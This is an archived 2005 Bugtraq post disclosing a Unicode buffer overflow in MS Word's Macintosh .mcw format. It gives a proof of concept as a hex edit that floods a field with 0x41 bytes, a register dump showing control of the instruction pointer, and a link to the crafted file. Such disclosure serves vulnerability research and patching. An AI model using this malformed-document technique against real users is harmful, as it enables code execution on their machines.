[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050519233334.27356.qmail@www.securityfocus.com>
Date: 19 May 2005 23:33:34 -0000
From: Bahaa Naamneh <b_naamneh@...mail.com>
To: bugtraq@...urityfocus.com
Subject: UNICODE BUFFER OVERFLOW IN MS-WORD
UNICODE BUFFER OVERFLOW IN MS-WORD
===================================
*.mcw is the ms-word format file for Macintosh.
the unicode buffer overflow occurs when the user opens the malformed *.mcw document.
Proof of concept:
-----------------
by modifying the *.mcw file by using binary editor as follows
these lines were taken from .mcw file:
------snip---mcw-file----
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00
00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77
------snip---------------
change them as follows:
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68
61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73
------------
EAX = 00000000 EBX = 00000000 ECX = 00000006
EDX = 7C90EB94 ESI = 00000001 EDI = 001262B0
EIP = 00410041 ESP = 00126110 EBP = 00410041
EFL = 00000246
------------
* modified .mcw file can be downloaded from:
http://study.haifa.ac.il/~bnaamnih/word/foo.mcw
---------------------
Bahaa Naamnmeh
b_naamneh@...mail.com
www.bsecurity.tk
Powered by blists - more mailing lists